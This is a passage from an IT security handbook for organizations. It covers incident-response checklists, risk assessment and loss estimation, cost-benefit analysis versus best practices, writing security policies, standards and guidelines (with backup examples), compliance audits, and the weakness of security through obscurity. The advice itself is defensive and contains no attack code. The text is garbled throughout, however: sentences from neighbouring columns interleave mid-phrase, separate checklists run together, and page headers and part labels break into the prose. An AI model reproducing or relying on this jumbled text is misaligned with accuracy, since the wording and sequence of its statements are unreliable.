appropriate reports with internal and external caused or aided by insufficient knowledge of proper authorities when necessary. procedures regarding security issues. Everyone in the company should know how to implement security related procedures. · Designating a point of contact ­ this person should have expertise in the area of IT security and may answer directly to members of the management team. 52This recommendation would be most applicable to medium sized, or large enterprises. It would also apply to companies that are heavily dependent on technology for their operations and/or focused on the high tech market. In the latter case, potential customers may form some opinions about the company based on its technical appearance and smoothness of operation. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 97 · Understanding and prioritizing your goals ­ these Procedures and Personnel: will include some or all of the following: o Have all key personnel been trained in o Protect customer information using the procedures? o Contain the attack o Have key personnel actually attended o Notify senior management all requires training sessions? o Document the event o Have appropriate background check been o Take a snapshot of the system conducted on key personnel? o Contact a Computer Security Incident o Are communications between and among the Response Team system administration and security groups o Identify the intruder flowing smoothly? o Know who is responsible for what o Know whom you can trust Procedures and Technical Resources: If an incident does occur, you should reexamine your o Are system logs enabled? exiting policies and procedures and tighten them up o Are system logs periodically reviewed? when logistically and financially possible. As with the o Are the tools needed to detect an intrusion organization evaluation, asking a series of questions will installed and operational? help to define the strengths and weakness in a security o Can the detection software installed on your net policy plan. A sample checklist focused on the ability work detect unknown attacks? P to respond effectively to a break in would include: o Can you detect and prevent attacks on the net ART work and the host, constituting a layered Incident procedures, recovery plans, and funding: approach to detection? o Are attacks easy to trace back on your network? THREE o Do incident response procedures exits? o Do all systems have adequate security controls o Are procedures understandable and up-to-date? as proven by formal audit results? o Are disaster recovery plans in place? o Has adequate funding been allotted for Steps in Risk Evaluation developing and maintaining incident responses to break-ins? The first step in improving the security of your system is to answer these basic questions: Procedures, security experts, and management: · What am I trying to protect and how much is it o Do the procedures include instructions for worth to me? contacting a security expert 24-hours-a-day, · What do I need to protect against? 7-days-a-week? · How much time, effort, and money am I willing to o If the security expert does not respond, does a expend to obtain adequate protection? procedure exist for escalating the problem to management? These questions form the basis of the process known as o Do procedures include notifying the Chief risk assessment. Risk assessment is a very important Information Officer (when applicable) part of the computer security process. You cannot for- immediately when any break-in occurs, and mulate protections if you do not know what you are again when the break-in is resolved? protecting and what you are protecting those things o Is there a procedure for determining when to against! After you know your risks, you can then plan contact outside help, and whom to contact? the policies and techniques that you need to implement to reduce those risks. 98 INFORMATION SECURITY AND GOVERNMENT POLICIES For example, if there is a risk of a power failure and if Tangibles: availability of your equipment is important to you, you can reduce this risk by installing an uninterruptible · Computers power supply (UPS). · Proprietary data · Backups and archives Risk assessments involves three key steps: · Manuals, guides, books · Printouts 1. Identifying assets and their value · Commercial software distribution media 2. Identifying threats · Communications equipment and wiring 3. Calculating risks · Personnel records · Audit records There are many ways to go about this process. One method with which we have had great success Intangibles: is a series of in-house workshops. Invite a broad cross-section of knowledgeable users, managers, and · Safety and health of personnel executives from throughout your organization. Over · Privacy of users the course of a series of meetings, compose your lists · Personnel passwords of assets and threats. Not only does this process help · Public image and reputation to build a more complete set of lists, it also helps to · Customer/client goodwill increase awareness of security in everyone who attends. · Processing availability · Configuration information An actuarial approach is more complex than necessary for protecting a home computer system or very small You should take a larger view of these and related items company. Likewise, the procedures that we present here rather than simply considering the computer aspects. If are insufficient for a large company, a government you are concerned about someone reading your internal agency, or a major university. In cases such as these, financial reports, you should be concerned regardless of many companies turn to outside consulting firm with whether they read them from a discarded printout or expertise in risk assessment, some of which use specialized snoop on your e-mail. software to do assessments. Identifying threats Identifying assets The next step is to determine a list of threats to your Draw up a list of items you need to protect. This list assets. Some of these threats will be environmental, and should be based on your business plan and common include fire, earthquake, explosion, and flood. They should sense. The process may require knowledge of applicable also include very rare but possible events such as building law, a complete understanding of your facilities, and structural failure, or discovery of asbestos in your computer knowledge of your insurance coverage. Items to protect room that requires you to vacate the building for a include tangibles (disk drives, monitors, network cables, prolonged time. Other threats come from personnel, backup media, manuals) and intangibles (ability to and from outsiders. We list some examples here: continue processing, your customer list, public image, reputation in your industry, access to your computer, your system's root password). The list should include · Illness of key people everything that you consider of value. To determine if · Simultaneous illness of many personnel something is valuable, consider what the loss or damage (e.g., flu epidemic) of the item might be in terms of lost revenue, lost time, · Loss (resignation/termination/death) of key or the cost of repair or replacement. personnel · Loss of phone/network services Some of the items that should probably be in your asset · Loss of utilities (phone, water, electricity) list include: for a short time Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 99 · Loss of utilities (phone, water, electricity) for a your cost calculation will increase your effort, but will prolonged time also increase the accuracy of your calculations. · Lightning strike For most purposes, you do not need to assign an exact · Flood value to each possible risk. Normally, assigning a cost · Theft of disks or tapes range to each item is sufficient. Some items may actual- · Theft of key person's laptop computer ly fall into the category irreparable or irreplaceable; · Theft of key person's home computer these could include loss of your entire accounts-due · Introduction of a virus database, or the death of a key employee. You may want · Bankruptcy of a key vendor or service provider to assign these costs based on a finer scale of loss than · Hardware failure simply "lost/not lost." For instance, you might want to · Bugs in software assign separate costs for each of the following categories: · Subverted employees · Subverted third-party personnel · Non-availability over a short term (< 7­10 days) (e.g., vendor maintenance) · Non-availability over a medium term (1­2 weeks) · Labor unrest · Non-availability over a long term · Political terrorism (more than 2 weeks) · Random "attackers" getting into your machines · Permanent loss or destruction · Users posting inflammatory or proprietary · Accidental partial loss or damage information on the Web · Deliberate partial loss or damage · Commercial (corporate) spies · Unauthorized disclosure within the organization P · Unauthorized disclosure to some outsiders ART Review Your Risks · Unauthorized full disclosure to outsiders, Risk assessment should not be done only once and then competitors, and the press forgotten. Instead, you should update your assessment · Replacement or recovery cost THREE periodically, at least once a year, and any time there is a major change in personnel, systems, or the operating The Probability of a Loss environment.53 In addition, the threat assessment por- After you have identified the threats, you need to tion should be redone whenever you have a significant estimate the likelihood of each occurring. These threats change in operation or structure. Thus, if you reorgan- may be easiest to estimate on a year-by-year basis. ize, move to a new building, switch vendors, or undergo Quantifying the threat of a risk is hard work. You can other major changes, you should reassess the threats obtain some estimates from third parties, such as and potential losses. insurance companies. If the event happens on a regular basis, you can estimate it based on your records. Loss Analysis Industry organizations may have collected statistics or published reports. You can also base your estimates Determining the cost of losses can be very difficult. A on educated guesses extrapolated from past experience. simple cost calculation considers the cost of repairing For instance: or replacing a particular item. A more sophisticated cost · Your power company (and your past experience) calculation can consider the cost of having equipment can provide an estimate of the likelihood that your out of service, the cost of added training, the cost of building would suffer a power outage during the additional procedures resulting from a loss, the cost to next year. Officials may also be able to quantify the a company's reputation, and even the cost to a company's risk of an outage lasting a few seconds vs. the risk clients. Generally speaking, including more factors in of an outage lasting minutes or hours. 53Changes in personnel include many new hires or layoffs, or a layoff of someone involved in your organization's security plan. Changes in systems include installing a number of new systems (the sensitivity of the number depends on the size of your organization; if you have 100 computers and add one securely it does not require a risk assessment. However, if you have ten computers and add another ten, that expansion might merit a fresh look at your organization. Other relevant system changes would include establishing new internal or external networks, upgrading your systems, or altering your computing platform. Changes to the organization include rapid growth, linking to international suppliers or customers, and marketing campaigns that may make you a more visible presence (and a more visible target) in your locality and the world. 100 INFORMATION SECURITY AND GOVERNMENT POLICIES · Your personnel records can be used to estimate the This comparison results in a prioritized list of things you probability of key computing employees quitting. should address. The list may be surprising. Your goal · Past experience and best guess can be used to should be to avoid expensive, probable losses, before estimate the probability of a serious bug being worrying about less likely, low-damage threats. In many discovered in your software during the next year environments, fire and loss of key personnel are much (100% for some software platforms). more likely to occur, and are more damaging than a break- in over the network. Surprisingly, however, it is break-ins If you expect something to happen more than once per that seem to occupy the attention and budget of most year, then record the number of times that you expect managers. This practice is simply not cost-effective, nor it to happen. Thus, you may expect a serious earth- does it provide the highest levels of trust in your overall quake only once every 100 years (1% in your list), system. To figure out what you should do, take the fig- but you may expect three serious bugs in Microsoft's ures that you have gathered for avoidance and recovery Internet Information Server (IIS) to be discovered to determine how best to address your high-priority during the next month (3600%). items. The way to do this is to add the cost of recovery to the expected average loss, and multiply that by the The Cost of Prevention probability of occurrence. Then, compare the final prod- Finally, you need to calculate the cost of preventing uct with the yearly cost of avoidance. If the cost of each kind of loss. For instance, the cost to recover from avoidance is lower than the risk you are defending a momentary power failure is probably only that of per- against, you would be advised to invest in the avoidance sonnel "downtime" and the time necessary to reboot. strategy if you have sufficient financial resources. If the However, the cost of prevention may be that of buying cost of avoidance is higher than the risk that you are and installing a UPS system. defending against, then consider doing nothing until after other threats have been dealt with. Costs need to be amortized over the expected lifetime of your approaches, as appropriate. Deriving these costs may reveal secondary costs and credits that should also be factored in. For instance, installing a better fire-suppression system may result in a yearly decrease in your fire insurance premiums and give you a tax benefit for capital depreciation. But spending money on a fire-suppression system means that the money is not available for other purposes, such as increased employee training or even investments. Adding Up the Numbers At the conclusion of this exercise, you should have a multidimensional table consisting of assets, risks, and possible losses. For each loss, you should know its prob- ability, the predicted loss, and the amount of money required to defend against the loss. If you are very pre- cise, you will also have a probability that your defense will prove inadequate. The process of determining if each defense should or should not be employed is now straightforward. You do this by multiplying each expect- ed loss by the probability of its occurring as a result of each threat. Sort these in descending order, and compare each cost of occurrence to its cost of defense. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 101 CHAPTER 4. 4) Implementing security PLANNING YOUR SECURITY NEEDS 5) Performing audit and incident response At a Glance There are two critical principles implicit in effective policy and security planning: This chapter covers policy and procedural issue related Policy and security awareness must be driven from the to creating an effective defense to the security threats top down in the organization. Security concerns and presented in the previous chapter and goes into greater awareness by the users are important, but they cannot detail on the planning process. build or sustain an effective culture of security. Instead, Effective Security Based on Technical the head(s) of the organization must treat security as Solutions and Policy Guidance important, and abide by all the same rules and regula- tions as everyone else. Fundamentally, computer security is a series of technical Effective computer security means protecting information. solutions to non-technical problems. You can spend an Although protecting resources is also critical, resource unlimited amount of time, money, and effort on computer losses are more easily identified and remedied than infor- security, but you will never quite solve the problem of mation losses. All plans, policies and procedures should accidental data loss or intentional disruption of your reflect the need to protect information in whatever forms activities. Given the right set of circumstances--software it takes. Proprietary data does not become worthless bugs, accidents, mistakes, bad luck, bad weather, or a P when it is on a printout or is faxed to another site sufficiently motivated and well-equipped attacker--any ART instead of contained in a disk file. Customer confidential computer can be compromised, rendered useless, or even information does not suddenly lose its value because it is totally destroyed. recited on the phone between two users instead of con- THREE tained within an e-mail message. The information should The job of the security professional is to help be protected no matter what its form. organizations decide how much time and money need to be spent on security. Another part of that job is to There are many different kinds of computer security, and make sure that organizations have policies, guidelines, many different definitions. Rather than present a formal and procedures in place so that the money spent is spent definition, this Handbook takes a practical approach and well. And finally, the professional needs to audit the discusses the categories of protection you should consider. system to ensure that the appropriate controls are implemented correctly to achieve the policy's goals. Types of Security Concerns Thus, practical security is really a question of management and administration more than it is one of technical skill. Within this broad definition, there are many different Consequently, security must be a priority of your organi- types of security that both users and administrators of zation's management. Even in a very small enterprise computer systems need to be concerned about:54 without a significant budget for security, the manage- ment should understand the core security issues and Confidentiality implement basic (and relatively inexpensive) measures Protecting information from being read or copied by to protect its assets. anyone who has not been explicitly authorized by the owner of that information. This type of security includes Security planning may be divided into five discrete steps: not only protecting the information in toto, but also 1) Planning to address your security needs protecting individual pieces of information that may 2) Conducting a risk assessment or adopting best seem harmless by themselves but that can be used to practices infer other confidential information. 3) Creating policies to reflect your needs 54See also the COBIT approach to security methodology http://www.isaca.org/cobit.htm 102 INFORMATION SECURITY AND GOVERNMENT POLICIES Data integrity Although all of these aspects of security are important, Protecting information (including programs) from being different organizations will view each with a different deleted or altered in any way without the permission of amount of importance. This variance is because different the owner of that information. Information to be protected organizations have different security concerns, and must also includes items such as accounting records, backup set their priorities and policies accordingly. tapes, file creation times, and documentation. For example: Availability A Banking Environment Protecting your services so they're not degraded or made unavailable (crashed) without authorization. If the In such an environment, integrity, control, and systems or data are unavailable when an authorized user auditability are usually the most critical concerns, needs them, the result can be as bad as having the while confidentiality and availability are the next in information that resides on the system deleted. importance. A national defenserelated system that processes classified information. In such an environ- Consistency ment, confidentiality may come first, and availability Making sure that the system behaves as expected by the last. In some highly classified environments, officials authorized users. If software or hardware suddenly starts may prefer to blow up a building rather than allow an behaving radically differently from the way it used to attacker to access the information contained within behave, especially after an upgrade or a bug fix, a disas- that building's walls. ter could occur. Imagine if your ls command occasionally deleted files instead of listing them! This type of security A University can also be considered as ensuring the correctness of the In such an environment, integrity and availability may data and software you use. be the most important requirements. It is more important to ensure that students can work on their papers, than Control that administrators can track the precise times that Regulating access to your system. If unknown and students accessed their accounts. unauthorized individuals (or software) are found on your system, they can create a big problem. You must worry If you are a security administrator, you need to about how they got in, what they might have done, and thoroughly understand the needs of your operational who or what else has also accessed your system. environment and users. You then need to define your Recovering from such episodes can require considerable procedures accordingly. Not everything we describe in time and expense for rebuilding and reinstalling your this book will be appropriate in every environment. system, and verifying that nothing important has been changed or disclosed--even if nothing actually happened. Trust Audit Security professionals generally don't refer to a As well as worrying about unauthorized users, authorized computer system as being "secure" or "unsecure." users sometimes make mistakes, or even commit mali- Instead, we use the word trust to describe our level cious acts. In such cases, you need to determine what of confidence that a computer system will behave as was done, by whom, and what was affected. The only expected. This acknowledges that absolute security sure way to achieve these results is by having some can never be present. We can only try to approach it incorruptible record of activity on your system that posi- by developing enough trust in the overall configuration tively identifies the actors and actions involved. In some to warrant using it for the applications we have in critical applications, the audit trail may be extensive mind. Developing adequate trust in your computer enough to allow "undo" operations to help restore the systems requires careful thought and planning. system to a correct state. Operational decisions should be based on sound policy and risk analysis and it is important to get professional advice when possible: Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 103 If you are at a larger company, university, or government over time, as new security vulnerabilities are discovered, agency, we suggest that you contact your internal audit or does it decrease over time, as the vulnerabilities are and/or risk management department for additional help publicized and corrected? Does a well-maintained sys- (they may already have some plans and policies in place tem become less secure or more secure over time? And that you should know about). You can also learn more how do you calculate the likely damages of a successful about this topic by consulting some of the works refer- penetration? Unfortunately, few statistical, scientific enced in the Annexes. You may also wish to enlist a studies have been performed on these questions. Many consulting firm. For example, many large accounting people think they know the answers to these questions, and audit firms now have teams of professionals that but research has shown that most people badly estimate can evaluate the security of computer installations. risk based on personal experience. If you are with a smaller institution or are dealing with Because of the difficulty inherent in risk analysis, a personal machine, you may not have specialized another approach for securing computers has emerged departments to call on and you should review Part 2 of in recent years called best practices, or due care. This this Handbook carefully. You may decide that we cover approach consists of a series of recommendations, pro- these issues in greater detail than you actually need. cedures, and policies that are generally accepted within However, the information contained in these chapters the community of security practitioners to give organi- should help guide you in setting your priorities. zations a reasonable level of overall security and risk mitigation at a reasonable cost. Best practices can be Cost-Benefit Analysis and Best Practices thought of as "rules of thumb" for implementing sound P security measures. ART Time and money are finite. After you complete your risk assessment, you will have a long list of risks -- far The best practices approach is not without its problems. more than you can possibly address or defend against. The biggest problem is that there really is no one set of THREE You now need a way of ranking these risks to decide "best practices" that is applicable to all sites and users. which you need to mitigate through technical means, The best practices for a site that manages financial which you will insure against, and which you will simply information might have similarities to the best practices accept. Traditionally, the decision of which risks to for a site that publishes a community newsletter, but address and which to accept was done using a cost- the financial site would likely have additional security benefit analysis, a process of assigning cost to each measures. possible loss, determining the cost of defending against it, determining the probability that the loss will occur, Following best practices does not assure that your and then determining if the cost of defending against system will not suffer a security-related incident. the risk outweighs the benefit. Most best practices require that an organization's securi- ty office monitor the Internet for news of new attacks Risk assessment and cost-benefit analyses generate a and download patches from vendors when they are made lot of numbers, making the process seem quite scientific available. But even if you follow this regimen, an and mathematical. In practice, however, putting togeth- attacker might still be able to use a novel, unpublished er these numbers can be a time-consuming and expen- attack to compromise your computer system. And if your sive process, and the result are numbers that are fre- news feed is down, or the person monitoring the mailing quently soft or inaccurate. Risk analysis depends on the lists goes on vacation, then the attackers will have a ability to gauge the expected use of an asset, assess lead on your process of installing needed patches. the likelihood of each risk to the asset, identify the fac- tors that enable those risks, and calculate the potential The very idea that tens of thousands of organizations impact of various choices--figures that are devilishly could or even should implement the "best" techniques hard to pin down. How do you calculate the risk that an available to secure their computers is problematical. The attacker will be able to obtain system administrator "best" techniques available are simply not appropriate privileges on your web server? Does this risk increase or cost-effective for all organizations. 104 INFORMATION SECURITY AND GOVERNMENT POLICIES Many organizations that claim to be following best practices are actually adopting the minimum standards commonly used for securing systems. In practice, most best practices really aren't. We recommend a combination of risk analysis and best practices. Starting from a body of best practices, an educated designer should evaluate risks and trade-offs, and pick reasonable solutions for a particular configura- tion and management. For instance, servers should be hosted on isolated machines, and configured with an operating system and software providing the minimally required functionality. The operators should be vigilant for changes, keep up-to-date on patches, and prepare for the unexpected. Doing this well takes a solid under- standing of how the system works, and what happens when it doesn't work. This is the approach that we will explain in the sections that follow. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 105 CHAPTER 5. Another benefit of risk assessment is that it helps ORGANIZATIONAL SECURITY POLICY to justify to management that you need additional AND PREVENTION resources for security. Most managers and directors know little about computers, but they do understand At A Glance risk and cost/benefit analysis. If you can show that your organization is currently facing an exposure to risk that could total a certain monetary amount per year This chapter addresses security policy from the bottom (add up all the expected losses plus recovery costs for up and the top down; everyone in the organization has what is currently in place), then this estimate might some role to play in ensuring the security of computers, help convince management to fund some additional networks, and data. Supplementary management check- personnel and resources. lists to this chapter have been provided at the end of Part 3. On the other hand, going to management with a vague Security in a Working Organization "We're really likely to see several break-ins on the Internet after the next CERT/CC announcement" is unlikely to produce anything other than mild concern (if that). Security is not free. The more elaborate your security measures become, the more expensive they become. The Role of Security Policy Systems that are more secure may also be more difficult to use, although this need not always be the case. Policy helps to define what you consider to be valuable, Security can also get in the way of "power users," who P and it specifies what steps should be taken to safeguard wish to exercise many difficult and sometimes dangerous ART those assets. operations with-out authentication or accountability. Some of these power users can be politically powerful Policy can be formulated in a number of different ways. within your organization. Alternatively, some organiza- THREE You could write a very simple, general policy of a few tions may feel that any security measures are too costly pages that covers most possibilities. You could also and will try to conduct business without taking the time craft a policy for different sets of assets: a policy for to assess the true costs of implementation and the e-mail, a policy for personnel data, and a policy on potential losses from a negligent attitude. A series of accounting information. A third approach, taken by checklists has been provided at the end of Part 3 which many large corporations, but applicable to organizations outline steps that may be taken, at various levels, to of all sizes, is to have a small, simple policy augmented ensure that the computing environment is as safe as with standards and guidelines for appropriate behavior. possible, given certain constraints on time, personnel, We'll briefly outline this latter approach, with the read- and financial resources. er's understanding that simpler policies can be crafted; more information is given in the references. After you have completed your risk assessment and cost-benefit analysis, you will need to convince your Policy plays three major roles. First, it makes clear what organization's management of the need to act upon the is being protected and why. Second, it clearly states the information. Normally, you would formulate a policy that responsibility for that protection. Third, it provides a is then officially adopted. Frequently, this process is an ground on which to interpret and resolve any later uphill battle. Fortunately, it does not have to be. The goal conflicts that might arise. What the policy should not of risk assessment and cost-benefit analysis is to priori- do is list specific threats, machines, or individuals by tize your actions and spending on security. If your busi- name--the policy should be general and change little ness plan is such that you should not have an uninsured over time. risk of more than a certain monetary amount per year, you can use your risk analysis to determine what needs to be spent to achieve this goal. Your analysis can also be a guide as to what to do first, and then second, and can identify which things you should relegate to later years. 106 INFORMATION SECURITY AND GOVERNMENT POLICIES Standards Guidelines Standards are intended to codify the successful Guidelines are the "should" statements in policies. practice of security in an organization. They are The intent of guidelines is to interpret standards for generally phrased in terms of "shall." Standards are a particular environment--whether that is a software generally platform independent, and at least imply a environment or a physical environment. Unlike standards, metric to determine if they have been met. Standards guidelines may be violated, if necessary. As the name are developed in support of policy, and change slowly suggests, guidelines are not usually used as standards over time. Standards might cover such issues as how to of performance, but as ways to help guide behavior. screen new hires, how long to keep backups, and how to test UPS systems. Here is a typical guideline for backups: For example, consider a standard for backups. Backups on Unix-based machines should be done with It might state: the "dump" program. Backups should be done nightly, Backups shall be made of all online data and software in single-user mode, for systems that are not in 24-hour on a regular basis. In no case will backups be done production use. Backups for systems in 24-hour produc- any less often than once every 72 hours of normal tion mode should be made at the shift change closest business operation. All backups should be kept for a to midnight, when the system is less loaded. All back- period of at least six months; the first backup in ups will be read and verified immediately after being January and July of each year will be kept indefinitely written. at an off-site, secured storage location. At least one full backup of the entire system shall be taken every Level 0 dumps will be done for the first backup in other week. All backup media will meet accepted January and July. Level 3 backups should be done on industry standards for its type, to be readable after a the 1st and 15th of every month. Level 5 backups minimum of five years in unattended storage. should be done every Monday and Thursday night, unless a level 0 or level 3 backup is done on that day. This standard does not name a particular backup mecha- Level 7 backups should be done every other night nism or software package. It clearly states, however, except on holidays. what is to be stored, how long it is to be stored, and how often it is to be made. Once per week, the administrator will pick a file at ran- dom from some backup made that week. The operator Consider a possible standard for authentication: will be required to recover that file as a test of the Every user account on each multi-user machine shall backup procedures. have only one person authorized to use it. That user will be required to authenticate his or her identity to Guidelines tend to be very specific to particular archi- the system using some positive proof of identity. This tectures and even to specific machines. Guidelines also proof of identity can be through the use of an tend to change more often than do standards, to reflect approved authentication token or smart card, an changing conditions. approved one-time password mechanism, or an approved biometric unit. Reusable passwords will not Some Key Ideas in Developing be used for primary authentication on any machine a Workable Policy that is ever connected to a network or modem, that is portable and carried off company property, or that is The role of policy (and associated standards and guide- used outside of a private office. lines) is to help protect those items you (collectively) view as important. They do not need to be overly spe- cific and complicated in most instances. Sometimes, a simple policy statement is sufficient for your environment, as in the following example. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 107 The use and protection of this system is everyone's the system. Don't try to shift responsibility for what responsibility. Only do things you would want everyone you do to someone else and don't hide your identity. else to do, too. Respect the privacy of other users. If Don't have a bad time! you find a problem, fix it yourself or report it right away. Abide by all applicable laws concerning use of the When writing policies, keep users in mind. They will system. Be responsible for what you do and always make mistakes, and they will misunderstand. The policy identify yourself. Have fun! should not suggest that users will be thrown to the wolves if an error occurs. Other times, a more formal policy, reviewed by a legal professional and various security consultants, Furthermore, consider that information systems may is the way you need to go to protect your assets. contain information about users that they would like to Each organization will be different. There are some keep somewhat private. This may include some e-mail, key ideas to your policy formation, though, that need personnel records, and job evaluations. This material to be mentioned more explicitly. should be protected, too, although you may not be able to guarantee absolute privacy. Be considerate of users' Assign an owner needs and feelings. Every piece of information and equipment to be Concentrate on training and awareness protected should have an assigned "owner." The owner is the person who is responsible for the information, You would be wise to include standards for training P including its copying, destruction, backups, and other and retraining of all users. Every user should have ART aspects of protection. This is also the person who has basic security awareness education, with some form some authority with respect to granting access to the of periodic refresher material (even if the refresher information. only involves being given a copy of this book!). THREE Trained and educated users are less likely to fall for The problem with security in many environments is that scams and social engineering attacks. They are also there is important information that has no clear owner. more likely to be happy about security measures if As a result, users are never sure who makes decisions they understand why they are in place. about the storage of the information, or who regulates access to the information. Information (and even A crucial part of any security system is giving staff time equipment!) sometimes disappears without anyone and support for additional training and education. There noticing for a long period of time because there is no are always new tools and new threats, new techniques, "owner" to contact or monitor the situation. and new information to be learned. If staff members are spending 60 hours each week chasing down phantom PC Be positive viruses and doing backups, they will not be as effective as staff given a few weeks of training time each year. People respond better to positive statements than to Furthermore, they are more likely to be happy with their negative ones. Instead of building long lists of "don't work if they are given a chance to grow and learn on do this" statements, think how to phrase the same the job, and are allowed to spend evenings and week- information positively. The abbreviated policy statement ends with their families instead of trying to catch up on above could have been written as a set of "don'ts" as installing software and making backups. follows, but consider how much better it read originally: Have authority commensurate with responsibility: It's your responsibility not to allow misuse of the system. Don't do things you wouldn't want others to The first principle of security administration: do, too. Don't violate the privacy of others. If you find a problem, don't keep it a secret if you can't fix If you have responsibility for security, but have no it yourself. Don't violate any laws concerning use of authority to set rules or punish violators, it is likely 108 INFORMATION SECURITY AND GOVERNMENT POLICIES that you will have to take the blame when something and the accidental insertion of malicious code. big goes wrong. They may also be used contrary to organizational policy (e.g., to run a business, or host a web This Part includes checklists for managers and personnel server with questionable content). The policy who will be responsible for security. Important elements needs to make clear how these machines are to be to any organization's security plan are covered includ- used, protected, and audited. ing: communication, awareness, training, and appropri- o Media is dense and portable. If someone makes a ate funding to support the plan. CD or DVD of the company financial records to use at a remote site, what happens if the media is Be sure you know your security perimeter stolen or misplaced? Policies should govern who is allowed to take media off-site, how it is to be When you write your policy, you want to be certain to protected (including encryption) and what is to include all of the various systems, networks, personnel, happen if it is lost or stolen. They should also and information storage within your security perimeter. detail how and when previously used media will be The perimeter defines what is "within" your control and destroyed to limit its potential exposure. concern. When formulating your policies, you need to o What are the policies governing people who bring be certain you include coverage of everything that is their own PDAs or laptops on site for meetings or "within" your perimeter or that could enter your simply while visiting? What are the rules governing perimeter and interact with your information resources. their connection to site networks, phone lines, In earlier years, many organizations defined their IT printers, or other devices? security perimeter to be their walls and fences. o What concerns are there about shipping computers Nowadays, the perimeter is less concrete. or storage devices offsite for maintenance. What if there is sensitive material on disk? What about For example, consider the following when developing leased equipment that is returned to the owner? your policies: o If business partners or contractors have access to your equipment, at your site or at theirs, who o Portable computers and PDAs can be used to access guards the material? How is it kept from unwanted information while away from your physical contamination or commingling with their own location. Furthermore, they may store sensitive sensitive data? information, including IP addresses, o What policies will be in place to govern the phone numbers, and passwords. These systems handling of information provided to your should have minimum levels of protection, organization under trade secret protection or including passwords, encryption, and physical license? Who is responsible for protecting the security markings. Users should have additional information, and where can it be kept and stored? training and awareness about dangers of theft and o What policies govern non-computer information eavesdropping. processing equipment? For instance, what policies o Wireless networks used on the premises or govern use of the printers, copiers, and fax otherwise connected to site resources may be machines? (Sensitive information on paper is no connected to by outsiders using directional less sensitive than online.) antennas or simply parked in a car outside the building with a laptop. Wireless networks Thinking about all these issues before a problem occurs should be configured and protected to prevent helps keeps the problems from occurring. Building sensi- sensitive material from being observed outside, ble statements into your security policy help everyone to and to prevent insertion of malicious code understand the concerns and take the proper precautions. by attackers. o Computers used at home by the organization's personnel are subject to penetration, theft, Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 109 Pick a basic approach to security issues 8. Inadequate maintenance 9. Overload/overuse Decide if you are going to build around the model 10. Organizational shortcomings of "Everything that is not specifically denied is 11. Lack of authority/responsibility permitted" or "Everything that is not specifically 12. Conflicting responsibilities permitted is denied." Then be consistent in how 13. Unclear/inconsistent/confusing tasking you define everything else. The first choice might be 14. Policy shortcomings most consistent with a relatively open environment, 15. Unforeseen risks such as a university, while the second case would be 16. Missing or incomplete policies more consistent with a commercial institution, such as 17. Conflicting policies a bank. 18. Mismatch between policy and environment Defend in depth What is key to note about this list is that the vast majority of causes of policy problems cannot be blamed When you plan your defenses and policy, don't stop at on the operator or administrator. Even inadequate train- one layer. Institute multiple, redundant, independent ing and overwork are generally not the administrator's levels of protection. Then include auditing and monitoring choice. Thus, a compliance audit should not be viewed to ensure that those protections are working. The (nor conducted) as an adversarial process. Instead, it chance of an attacker's evading one set of defenses is should be conducted as a collaborative effort to identify far greater than the chance of his evading three layers problems, obtain and reallocate resources, refine policies P plus an alarm system.55 and standards, and raise awareness of security needs. As ART with all security, a team approach is almost always the Ensuring Compliance and Security Audits most effective. When managed properly, your personnel can embrace good security. The key is to help them in THREE Formulating policy is not enough by itself. It is important doing their tasks rather than being "on the other side." to regularly determine if the policy is being applied correctly, and if the policy is correct and sufficient. The Problem with Security Through This is normally done with a compliance audit. The term Obscurity audit is overloaded, often used to mean (at least), a financial audit, an audit trail (log), a security audit of In traditional security, derived largely from military a system, and a compliance audit for policy. intelligence, there is the concept of "need to know." Information is partitioned, and you are given only as A compliance audit is a set of actions carried out to much as you need to do your job. In environments where measure whether standards set by policies are being met specific items of information are sensitive or where and, if not, why. Standards normally imply metrics and inferential security is a concern, this policy makes con- evaluation criteria that can be used by an auditor to siderable sense. If three pieces of information together measure this compliance. When standards are can form a damaging conclusion and no one has access not met, it can be because of any of a combination of: to more than two, you can ensure confidentiality. 1. Personnel shortcomings 2. Insufficient training or lack of appropriate skills In a computer operations environment, applying the 3. Overwork same need-to-know concept is usually not appropriate. 4. Malfeasance This is especially true if you should find yourself basing 5. Lack of motivation your security on the fact that something technical is 6. Material shortcomings unknown to your attackers. This concept can even hurt 7. Insufficient or inadequate resources your security. 55See "The 12 Layer Matrix: Building a Cyber-Fortress (2003)" by Tom Kellermann at: http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Tools 110 INFORMATION SECURITY AND GOVERNMENT POLICIES Consider an environment in which management decides serious flaw in it. An algorithm that is kept secret isn't to keep the manuals away from the users to prevent scrutinized by others, and thus someone who does them from learning about commands and options that discover the hole may have free access to your data might be used to crack the system. Under such circum- without your knowledge. stances, the managers might believe they have increased their security, but they probably have not. Likewise, keeping the source code of your operating A determined attacker will find the same documentation system or application secret is no guarantee of security. elsewhere--from other users or from other sites. Those who are determined to break into your system Extensive amounts of documentation are available as will occasionally find security holes, with or without close as the nearest bookstore! Management cannot source code.56 But without the source code, users can- close down all possible avenues for learning about the not carry out a systematic examination of a program for system. In the meantime, the local users are likely to problems. Thus, there may be some small benefit to keep- make less efficient use of the machine because they are ing the code hidden, but it shouldn't be depended on. unable to view the documentation and learn about more The key is attitude. Defensive measures that are based efficient options. They are also likely to have a poorer primarily on secrecy lose all their value if their secrecy attitude because the implicit message from management is breached. Even worse, when maintaining secrecy is "We don't completely trust you to be a responsible restricts or prevents auditing and monitoring, it can be user." Furthermore, if someone does start abusing com- impossible to determine whether secrecy has been mands and features of the system, management may not breached. You are better served by algorithms and have a pool of talent to recognize or deal with the mechanisms that are inherently strong, even if they're problem. And if something should happen to the one or known to an attacker. The very fact that you are using two users authorized to access the documentation, there strong, known mechanisms may discourage an attacker is no one with the requisite experience or knowledge to and cause the idly curious to seek excitement elsewhere. step in or help out. Putting your money in a wall safe is better protection than depending on the fact that no one knows that you Keeping bugs or features secret to protect them is also hide your money in a mayonnaise jar in your refrigerator. a poor approach to security. System developers often insert back doors in their programs to let them gain Responsible Disclosure privileges without supplying passwords. Other times, system bugs with profound security implications are Despite our objection to "security through obscurity," allowed to persist because management assumes that we do not advocate that you widely publicize new security nobody knows of them. The problem with these holes the moment that you find them. There is a difference approaches is that features and problems in the code between secrecy and prudence! If you discover a security have a tendency to be 